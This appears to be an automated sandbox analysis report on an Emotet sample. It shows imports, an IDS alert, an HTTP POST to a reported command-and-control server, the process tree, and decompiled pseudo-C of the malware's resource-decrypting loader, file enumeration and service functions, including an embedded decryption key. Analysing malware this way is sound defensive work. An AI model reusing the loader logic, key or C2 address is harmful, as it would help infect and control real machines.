                                          GDI32.dll     GetDeviceCaps, PatBlt, GetStockObject, Rectangle, DPtoLP, CreatePen, GetViewportOrgEx, AbortDoc, EndDoc, EndPage, StartPage, StartDocA, SetAbortProc, CreateDCA, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetCurrentPositionEx, GetObjectA, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, CreatePatternBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetTextExtentPoint32A, GetTextMetricsA, StretchDIBits, GetCharWidthA, CreateFontA, CreateFontIndirectA, LPtoDP, GetBkColor, GetNearestColor, GetTextColor, GetStretchBltMode, GetPolyFillMode, GetTextAlign, GetBkMode, GetROP2, GetTextFaceA, GetWindowOrgEx, SetRectRgn, CombineRgn, CreateRectRgnIndirect, SetTextColor, SetBkColor, GetClipBox, CreateBitmap, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteObject, DeleteDC, BitBlt, CreateCompatibleDC
                                          comdlg32.dll  GetFileTitleA, PrintDlgA, CommDlgExtendedError, GetSaveFileNameA, GetOpenFileNameA
                                          WINSPOOL.DRV  OpenPrinterA, DocumentPropertiesA, ClosePrinter
                                          ADVAPI32.dll  RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegCloseKey, GetFileSecurityA, SetFileSecurityA, RegSetValueExA
                                          SHELL32.dll   DragQueryFileA, DragFinish
                                          COMCTL32.dll

                                          Version Infos

                                          Description       Data
                                          LegalCopyright    Copyright (C) 2003
                                          InternalName      EffectDemo
                                          FileVersion       1, 0, 0, 1
                                          CompanyName
                                          LegalTrademarks
                                          ProductName       EffectDemo Application
                                          ProductVersion    1, 0, 0, 1
                                          FileDescription   EffectDemo MFC Application
                                          OriginalFilename  EffectDemo.EXE
                                          Translation       0x0409 0x04b0

                                          Possible Origin

                                          Language of compilation system  Country where language is spoken
                                          English                         United States

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp                 Protocol  SID      Message                                                Source Port  Dest Port  Source IP    Dest IP
                                          11/18/20-16:00:56.201479  TCP       2404324  ET CNC Feodo Tracker Reported CnC Server TCP group 13  49742        443        192.168.2.4  200.116.145.225

                                          Network Port Distribution

                                          TCP Packets


                                          UDP Packets


                                          HTTP Request Dependency Graph

                                          • 200.116.145.225
                                            • 200.116.145.225:443

                                          HTTP Packets

                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                          0           192.168.2.4  49742        200.116.145.225  443               C:\Windows\SysWOW64\setupugc\sort.exe

                                          Timestamp                            kBytes transferred  Direction  Data
                                          Nov 18, 2020 16:00:56.398037910 CET  157                 OUT        POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate
                                          DNT: 1
                                          Connection: keep-alive
                                          Referer: 200.116.145.225/
                                          Upgrade-Insecure-Requests: 1
                                          Content-Type: multipart/form-data; boundary=---------hcIbcONok
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                          Host: 200.116.145.225:443
                                          Content-Length: 4628
                                          Cache-Control: no-cache
                                          Nov 18, 2020 16:00:57.383925915 CET  162                 IN         HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Wed, 18 Nov 2020 15:00:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 132
                                          Connection: keep-alive
                                          Data Raw: 86 2d 97 64 dc 2f f8 df 14 38 07 51 47 c3 82 1e 9f a3 ba c8 d0 2b 43 69 bb 3b 52 61 27 3f 2a 29 23 ca ab b4 0c 87 79 27 e5 f8 12 aa 34 a6 67 1b cb d6 18 b7 d9 cd 1f 7e a9 3e d8 f6 74 85 25 34 ef 26 d3 d4 a7 7d dd 72 9d 53 6e ab e6 41 e3 1b 5d 14 0c 65 04 51 c3 9d 16 cd 48 17 e8 f2 17 79 96 33 16 89 ac 54 9d a3 23 36 b4 bc b1 be 1e e3 7b 1d ff ee 1e 79 1a 06 83 d0 8d 69 25 22 4a 20 90 a6 98 c3
                                          Data Ascii: -d/8QG+Ci;Ra'?*)#y'4g~>t%4&}rSnA]eQHy3T#6{yi%"J


                                          Code Manipulations

                                          System Behavior

                                          General

                                          Start time:16:00:37
                                          Start date:18/11/2020
                                          Path:C:\Users\user\Desktop\2ojdmC51As.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\2ojdmC51As.exe'
                                          Imagebase:0x400000
                                          File size:376832 bytes
                                          MD5 hash:5804D97670DCDFAB88BA830682355DAD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:16:00:38
                                          Start date:18/11/2020
                                          Path:C:\Windows\SysWOW64\setupugc\sort.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\setupugc\sort.exe
                                          Imagebase:0x400000
                                          File size:376832 bytes
                                          MD5 hash:5804D97670DCDFAB88BA830682355DAD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:16:00:59
                                          Start date:18/11/2020
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                          Imagebase:0x7ff6eb840000
                                          File size:51288 bytes
                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:16:01:07
                                          Start date:18/11/2020
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                          Imagebase:0x7ff6eb840000
                                          File size:51288 bytes
                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:16:01:15
                                          Start date:18/11/2020
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                          Imagebase:0x7ff6eb840000
                                          File size:51288 bytes
                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis


                                            Execution Graph

                                            Execution Coverage:2.6%
                                            Dynamic/Decrypted Code Coverage:44.4%
                                            Signature Coverage:26.3%
                                            Total number of Nodes:518
                                            Total number of Limit Nodes:59

                                            Graph


                                            Executed Functions

                                            Control-flow Graph

                                            C-Code - Quality: 88%
                                            			E004013A4(intOrPtr __ecx) {
                                            				void* _v8;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				char _v36;
                                            				char _v40;
                                            				intOrPtr _v44;
                                            				CHAR* _v52;
                                            				intOrPtr _v64;
                                            				char _v68;
                                            				void* _v72;
                                            				char _v88;
                                            				intOrPtr _v128;
                                            				char _v144;
                                            				intOrPtr _v148;
                                            				intOrPtr _v152;
                                            				void* _v156;
                                            				long _v160;
                                            				char _v176;
                                            				void* _v180;
                                            				intOrPtr _v184;
                                            				char _v200;
                                            				char _v216;
                                            				intOrPtr _v228;
                                            				char _v232;
                                            				intOrPtr _v236;
                                            				intOrPtr _v240;
                                            				intOrPtr _v244;
                                            				intOrPtr _v248;
                                            				char _v252;
                                            				void* _v256;
                                            				struct HINSTANCE__* _v260;
                                            				char _v264;
                                            				char _v268;
                                            				char _v272;
                                            				char _v288;
                                            				char _v292;
                                            				char _v296;
                                            				char _v300;
                                            				char _v316;
                                            				void* _v320;
                                            				intOrPtr _v448;
                                            				intOrPtr _v452;
                                            				intOrPtr _v456;
                                            				intOrPtr _v460;
                                            				intOrPtr _v464;
                                            				intOrPtr _v468;
                                            				intOrPtr _v472;
                                            				void* _t188;
                                            				void* _t189;
                                            				intOrPtr _t244;
                                            
                                            				_push(0xffffffff);
                                            				_push(E00429B1F);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t244;
                                            				_v448 = __ecx;
                                            				_v256 = 0;
                                            				_v256 = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateDirectoryA");
                                            				if(CreateDirectoryA("C:\\Windows\\Microsoft.NET", 0) == 0) {
                                            					_v152 = 0x1e55;
                                            					_v240 = 0x1155;
                                            					_v44 = 0x409;
                                            					_v72 = 0;
                                            					_v160 = 0;
                                            					_v252 = 0xa;
                                            					_v248 = _v152;
                                            					_v244 = _v44;
                                            					_v260 = 0;
                                            					_v176 = _v264;
                                            					E00401AE0( &_v176, 0);
                                            					E00401B90( &_v176, "LdrFin", E00405A40("LdrFin"));
                                            					_v8 = 0;
                                            					_v216 = _v268;
                                            					E00401AE0( &_v216, 0);
                                            					E00401B90( &_v216, "dReso", E00405A40("dReso"));
                                            					_v8 = 1;
                                            					_v36 = _v272;
                                            					E00401AE0( &_v36, 0);
                                            					E00401B90( &_v36, "urce_U", E00405A40("urce_U"));
                                            					_v8 = 2;
                                            					_v452 = E00402030( &_v288,  &_v176,  &_v216);
                                            					_v456 = _v452;
                                            					_v8 = 3;
                                            					E00402030( &_v232, _v456,  &_v36);
                                            					_v8 = 5;
                                            					E00401AE0( &_v288, 1);
                                            					_v200 = _v292;
                                            					E00401AE0( &_v200, 0);
                                            					E00401B90( &_v200, "Ldr", E00405A40("Ldr"));
                                            					_v8 = 6;
                                            					_v144 = _v296;
                                            					E00401AE0( &_v144, 0);
                                            					E00401B90( &_v144, "Acces", E00405A40("Acces"));
                                            					_v8 = 7;
                                            					_v88 = _v300;
                                            					E00401AE0( &_v88, 0);
                                            					E00401B90( &_v88, "sResource", E00405A40("sResource"));
                                            					_v8 = 8;
                                            					_v460 = E00402030( &_v316,  &_v200,  &_v144);
                                            					_v464 = _v460;
                                            					_v8 = 9;
                                            					E00402030( &_v68, _v464,  &_v88);
                                            					_v8 = 0xb;
                                            					E00401AE0( &_v316, 1);
                                            					_v52 = "ntdll.dll";
                                            					if(_v228 != 0) {
                                            						_v468 = _v228;
                                            					} else {
                                            						_v468 = 0x42b704;
                                            					}
                                            					_v184 = _v468;
                                            					if(_v64 != 0) {
                                            						_v472 = _v64;
                                            					} else {
                                            						_v472 = 0x42b704;
                                            					}
                                            					_v128 = _v472;
                                            					_v260 = LoadLibraryA(_v52);
                                            					 *0x437cbc = GetProcAddress(_v260, "LdrFindResource_U");
                                            					 *0x437cb4 = GetProcAddress(_v260, "LdrAccessResource");
                                            					_v236 =  *0x437cbc(0x400000,  &_v252, 3,  &_v40);
                                            					if(_v236 >= 0) {
                                            						_v236 =  *0x437cb4(0x400000, _v40,  &_v72,  &_v160);
                                            					}
                                            					_v180 = 0;
                                            					if(CreateDirectoryA("C:\\ProgramData\\", 0) == 0) {
                                            						_t189 = VirtualAlloc(0, _v160, 0x1000, 0x40); // executed
                                            						_v180 = _t189;
                                            					}
                                            					E00405700(_v180, _v72, _v160);
                                            					E0040107E("@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@", 0x2f,  &_v20);
                                            					E00401163(_v180, _v160,  &_v20);
                                            					_v156 = _v180;
                                            					_v148 = _v156();
                                            					_v320 = 0;
                                            					_v8 = 8;
                                            					E00401AE0( &_v68, 1);
                                            					_v8 = 7;
                                            					E00401AE0( &_v88, 1);
                                            					_v8 = 6;
                                            					E00401AE0( &_v144, 1);
                                            					_v8 = 5;
                                            					E00401AE0( &_v200, 1);
                                            					_v8 = 2;
                                            					E00401AE0( &_v232, 1);
                                            					_v8 = 1;
                                            					E00401AE0( &_v36, 1);
                                            					_v8 = 0;
                                            					E00401AE0( &_v216, 1);
                                            					_v8 = 0xffffffff;
                                            					E00401AE0( &_v176, 1);
                                            					_t188 = _v320;
                                            				} else {
                                            					_t188 = 0;
                                            				}
                                            				 *[fs:0x0] = _v16;
                                            				return _t188;
                                            			}






















































                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 004013DC
                                            • GetProcAddress.KERNEL32(00000000), ref: 004013E3
                                            • CreateDirectoryA.KERNELBASE(C:\Windows\Microsoft.NET,00000000), ref: 004013F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AddressCreateDirectoryLibraryLoadProc
                                            • String ID: @P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@$Acces$C:\ProgramData\$C:\Windows\Microsoft.NET$CreateDirectoryA$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$dReso$kernel32.dll$sResource$urce_U
                                            • API String ID: 3952968459-2121162702
                                            • Opcode ID: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
                                            • Instruction ID: 061a306ec623a826179d85857fa582b4a8c01ab5e49a60f3ccf10d5f337b011f
                                            • Opcode Fuzzy Hash: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
                                            • Instruction Fuzzy Hash: BDD14070E41258ABDB20DB90DD56BEEB7B4AB18304F1081EAE509772D1DBB81F84CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            C-Code - Quality: 73%
                                            			E022338F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				char _v524;
                                            				short _v1044;
                                            				short _v1588;
                                            				intOrPtr _v1590;
                                            				struct _WIN32_FIND_DATAW _v1636;
                                            				void* _v1640;
                                            				intOrPtr _v1652;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t22;
                                            				signed int _t24;
                                            				intOrPtr* _t28;
                                            				intOrPtr _t33;
                                            				void* _t35;
                                            				intOrPtr* _t39;
                                            				intOrPtr* _t41;
                                            				intOrPtr* _t43;
                                            				signed int _t49;
                                            				int _t55;
                                            				void* _t58;
                                            				void* _t93;
                                            				void* _t94;
                                            				void* _t95;
                                            				void* _t96;
                                            				void* _t97;
                                            				void* _t98;
                                            				void* _t100;
                                            
                                            				_t93 = __ecx;
                                            				_t97 = __edx;
                                            				_v1640 = __ecx;
                                            				_t22 = 0x1b0f738d;
                                            				_t58 = _v1640;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t100 = _t22 - 0xd5d5438;
                                            						if(_t100 <= 0) {
                                            							break;
                                            						}
                                            						if(_t22 == 0x1b0f738d) {
                                            							_t22 = 0x1c39f1c;
                                            							continue;
                                            						} else {
                                            							if(_t22 != 0x3aa0d798) {
                                            								goto L6;
                                            							} else {
                                            								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                            									_t24 = _a4( &_v1636, _a8);
                                            									asm("sbb eax, eax");
                                            									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
                                            								} else {
                                            									if(_v1636.cFileName != 0x2e) {
                                            										L30:
                                            										if(_t97 == 0) {
                                            											goto L29;
                                            										} else {
                                            											_t96 = E022334C0(0x223d260);
                                            											_t28 =  *0x223dc60;
                                            											if(_t28 == 0) {
                                            												_t28 = E02233E80(_t58, E02233F20(0xe66945e6), 0xcca28b0d, _t97);
                                            												 *0x223dc60 = _t28;
                                            											}
                                            											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
                                            											E022338F0( &_v524, _t97, _a4, _a8);
                                            											_t98 = _t98 + 0x1c;
                                            											E02233460(_t96);
                                            											_t22 = 0x60b76e4;
                                            										}
                                            									} else {
                                            										_t33 = _v1590;
                                            										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
                                            											L29:
                                            											_t22 = 0x60b76e4;
                                            										} else {
                                            											goto L30;
                                            										}
                                            									}
                                            								}
                                            								continue;
                                            							}
                                            						}
                                            						L40:
                                            					}
                                            					if(_t100 == 0) {
                                            						if( *0x223e004 == 0) {
                                            							 *0x223e004 = E02233E80(_t58, E02233F20(0xbb398380), 0xf53ce71f, _t97);
                                            						}
                                            						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
                                            						_t58 = _t35;
                                            						if(_t58 == 0xffffffff) {
                                            							return _t35;
                                            						} else {
                                            							_t22 = 0x3aa0d798;
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(_t22 == 0x1c39f1c) {
                                            							_t95 = E022334C0(0x223d240);
                                            							_t39 =  *0x223dc60;
                                            							if(_t39 == 0) {
                                            								_t39 = E02233E80(_t58, E02233F20(0xe66945e6), 0xcca28b0d, _t97);
                                            								 *0x223dc60 = _t39;
                                            							}
                                            							 *_t39( &_v1044, 0x104, _t95, _t93);
                                            							_t41 =  *0x223dea8;
                                            							_t98 = _t98 + 0x10;
                                            							if(_t41 == 0) {
                                            								_t41 = E02233E80(_t58, E02233F20(0xbb398380), 0x97f883e, _t97);
                                            								 *0x223dea8 = _t41;
                                            							}
                                            							_t94 =  *_t41();
                                            							_t43 =  *0x223e1a0;
                                            							if(_t43 == 0) {
                                            								_t43 = E02233E80(_t58, E02233F20(0xbb398380), 0x26c3f343, _t97);
                                            								 *0x223e1a0 = _t43;
                                            							}
                                            							 *_t43(_t94, 0, _t95);
                                            							_t93 = _v1652;
                                            							_t22 = 0xd5d5438;
                                            							goto L1;
                                            						} else {
                                            							if(_t22 == 0x60b76e4) {
                                            								if( *0x223dfd4 == 0) {
                                            									 *0x223dfd4 = E02233E80(_t58, E02233F20(0xbb398380), 0xd3e90d14, _t97);
                                            								}
                                            								_t49 = FindNextFileW(_t58,  &_v1636); // executed
                                            								asm("sbb eax, eax");
                                            								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
                                            								goto L1;
                                            							} else {
                                            								if(_t22 == 0x651b5f5) {
                                            									if( *0x223e064 == 0) {
                                            										 *0x223e064 = E02233E80(_t58, E02233F20(0xbb398380), 0xa4a77084, _t97);
                                            									}
                                            									_t55 = FindClose(_t58); // executed
                                            									return _t55;
                                            								}
                                            								goto L6;
                                            							}
                                            						}
                                            					}
                                            					goto L40;
                                            					L6:
                                            				} while (_t22 != 0x36605fc2);
                                            				return _t22;
                                            				goto L40;
                                            			}































                                            APIs
                                            • FindNextFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233976
                                            • FindFirstFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233A5D
                                            • FindClose.KERNELBASE(?,00000000,0223998D,16BF64F2,00000001), ref: 02233B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID: .$8T]$8T]$Ei$Ei
                                            • API String ID: 3541575487-3972632629
                                            • Opcode ID: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
                                            • Instruction ID: e2110a1afe3a452984fedbae5295bfbe0882b947111b9b60d376f3440b7b6ca3
                                            • Opcode Fuzzy Hash: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
                                            • Instruction Fuzzy Hash: B851C4F5B3430197C726EAF4A84467B36E6AB80354F04099DE946C7248EF79CA1587D2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            C-Code - Quality: 65%
                                            			E02235070(void* __ecx, short** __edx) {
                                            				char _v4;
                                            				char _v8;
                                            				short** _v12;
                                            				char _v16;
                                            				void* _v20;
                                            				void* _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v44;
                                            				signed int _v56;
                                            				intOrPtr _v68;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				intOrPtr _t16;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t23;
                                            				void* _t26;
                                            				void* _t30;
                                            				void* _t34;
                                            				void* _t37;
                                            				void* _t38;
                                            				void* _t39;
                                            				signed int _t40;
                                            				void* _t48;
                                            				short** _t81;
                                            				void* _t83;
                                            				signed int _t84;
                                            				void* _t85;
                                            				void* _t90;
                                            				void* _t93;
                                            				void* _t94;
                                            
                                            				_v12 = __edx;
                                            				_t48 = 0;
                                            				_t81 = _v12;
                                            				_t90 = 0;
                                            				_v20 = __ecx;
                                            				_t84 = 0x200c4c64;
                                            				while(1) {
                                            					_t16 = _v28;
                                            					while(1) {
                                            						L2:
                                            						_t93 = _t84 - 0x200c4c64;
                                            						if(_t93 > 0) {
                                            							break;
                                            						}
                                            						if(_t93 == 0) {
                                            							_t84 = 0xbb9a688;
                                            							continue;
                                            						} else {
                                            							_t94 = _t84 - 0xc62322e;
                                            							if(_t94 > 0) {
                                            								__eflags = _t84 - 0xd366d74;
                                            								if(_t84 == 0xd366d74) {
                                            									_t81 =  &(_t81[0xb]);
                                            									__eflags = _t81 - _t16;
                                            									asm("sbb esi, esi");
                                            									_t84 = (_t84 & 0x1131a8a6) + 0x18b16b79;
                                            									continue;
                                            								} else {
                                            									__eflags = _t84 - 0x18b16b79;
                                            									if(_t84 != 0x18b16b79) {
                                            										goto L39;
                                            									} else {
                                            										E02234250(_t48, _t90);
                                            										_t84 = 0x34957300;
                                            										while(1) {
                                            											_t16 = _v28;
                                            											goto L2;
                                            										}
                                            									}
                                            								}
                                            							} else {
                                            								if(_t94 == 0) {
                                            									_t37 =  *0x223db9c;
                                            									__eflags = _t37;
                                            									if(_t37 == 0) {
                                            										_t37 = E02233E80(_t48, E02233F20(0x667fdee), 0x72841a68, _t90);
                                            										 *0x223db9c = _t37;
                                            									}
                                            									_t38 =  *_t37(_v20, 0, 0x30, 3, _t48, 0x20000,  &_v8,  &_v16, 0, 0);
                                            									__eflags = _t38;
                                            									if(_t38 == 0) {
                                            										L29:
                                            										_t84 = 0x18b16b79;
                                            										while(1) {
                                            											_t16 = _v28;
                                            											goto L2;
                                            										}
                                            									} else {
                                            										_t39 =  *0x223dd4c;
                                            										__eflags = _t39;
                                            										if(_t39 == 0) {
                                            											_t39 = E02233E80(_t48, E02233F20(0xbb398380), 0xae3c1a47, _t90);
                                            											 *0x223dd4c = _t39;
                                            										}
                                            										_t40 =  *_t39();
                                            										_t84 = 0x29e3141f;
                                            										_t83 = (_t40 & 0x0000001f) * 0x2c + _t48;
                                            										_t16 = _v56 * 0x2c + _t48;
                                            										__eflags = _t83 - _t16;
                                            										_v68 = _t16;
                                            										_t81 =  >=  ? _t48 : _t83;
                                            										continue;
                                            									}
                                            									L47:
                                            								} else {
                                            									if(_t84 == 0xc9d2df) {
                                            										_t90 = E022342F0(_t48, 0x2000);
                                            										__eflags = _t90;
                                            										_t84 =  !=  ? 0xc62322e : 0x34957300;
                                            										while(1) {
                                            											_t16 = _v28;
                                            											goto L2;
                                            										}
                                            									} else {
                                            										if(_t84 != 0xbb9a688) {
                                            											L39:
                                            											__eflags = _t84 - 0x230370fe;
                                            											if(_t84 != 0x230370fe) {
                                            												while(1) {
                                            													_t16 = _v28;
                                            													goto L2;
                                            												}
                                            											}
                                            										} else {
                                            											_t16 = E022342F0(_t48, 0x20000);
                                            											_t48 = _t16;
                                            											if(_t48 != 0) {
                                            												_t84 = 0xc9d2df;
                                            												while(1) {
                                            													_t16 = _v28;
                                            													goto L2;
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L46:
                                            						return _t16;
                                            						goto L47;
                                            					}
                                            					__eflags = _t84 - 0x3024435d;
                                            					if(__eflags > 0) {
                                            						__eflags = _t84 - 0x34957300;
                                            						if(_t84 == 0x34957300) {
                                            							_t17 =  *0x223dea8;
                                            							__eflags = _t17;
                                            							if(_t17 == 0) {
                                            								_t17 = E02233E80(_t48, E02233F20(0xbb398380), 0x97f883e, _t90);
                                            								 *0x223dea8 = _t17;
                                            							}
                                            							_t85 =  *_t17();
                                            							_t19 =  *0x223e1a0;
                                            							__eflags = _t19;
                                            							if(_t19 == 0) {
                                            								_t19 = E02233E80(_t48, E02233F20(0xbb398380), 0x26c3f343, _t90);
                                            								 *0x223e1a0 = _t19;
                                            							}
                                            							return  *_t19(_t85, 0, _t48);
                                            						}
                                            						goto L39;
                                            					} else {
                                            						if(__eflags == 0) {
                                            							_t23 =  *0x223dd1c;
                                            							__eflags = _t23;
                                            							if(_t23 == 0) {
                                            								_t23 = E02233E80(_t48, E02233F20(0x667fdee), 0xe8428d8f, _t90);
                                            								 *0x223dd1c = _t23;
                                            							}
                                            							 *_t23(_v24, 1, _t90, 0x2000,  &_v4);
                                            							asm("sbb esi, esi");
                                            							_t26 =  *0x223ddb8;
                                            							_t84 = (_t84 & 0x1dde7ce2) + 0xd366d74;
                                            							__eflags = _t26;
                                            							if(_t26 == 0) {
                                            								_t26 = E02233E80(_t48, E02233F20(0x667fdee), 0x505cb3fe, _t90);
                                            								 *0x223ddb8 = _t26;
                                            							}
                                            							_t16 =  *_t26(_v44);
                                            							goto L39;
                                            						} else {
                                            							__eflags = _t84 - 0x29e3141f;
                                            							if(_t84 == 0x29e3141f) {
                                            								__eflags =  *0x223dab4;
                                            								if( *0x223dab4 == 0) {
                                            									 *0x223dab4 = E02233E80(_t48, E02233F20(0x667fdee), 0x203166f7, _t90);
                                            								}
                                            								_t30 = OpenServiceW(_v20,  *_t81, 1); // executed
                                            								__eflags = _t30;
                                            								_v24 = _t30;
                                            								_t84 =  !=  ? 0x3024435d : 0xd366d74;
                                            								continue;
                                            							} else {
                                            								__eflags = _t84 - 0x2b14ea56;
                                            								if(_t84 != 0x2b14ea56) {
                                            									goto L39;
                                            								} else {
                                            									_t34 =  *0x223dcf0;
                                            									__eflags = _t34;
                                            									if(_t34 == 0) {
                                            										_t34 = E02233E80(_t48, E02233F20(0x667fdee), 0x60075e37, _t90);
                                            										 *0x223dcf0 = _t34;
                                            									}
                                            									 *_t34(_v12, 1, _t90);
                                            									goto L29;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L46;
                                            				}
                                            			}



































                                            APIs
                                            • OpenServiceW.ADVAPI32(?,?,00000001,00000000,?,?,00000000,?,?,?,?,?,?,0223890D), ref: 02235260
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenService
                                            • String ID: ]C$0$]C$0$tm6$tm6
                                            • API String ID: 3098006287-1577568632
                                            • Opcode ID: 1c2b2a8c3210c0b2accbef479441618437f9ec0a63e185d060dbafee3c567305
                                            • Instruction ID: 27334de478ac2b60e13b1102a5e22ae2e498ffe39512ad7f05b8d8e0e02cb570
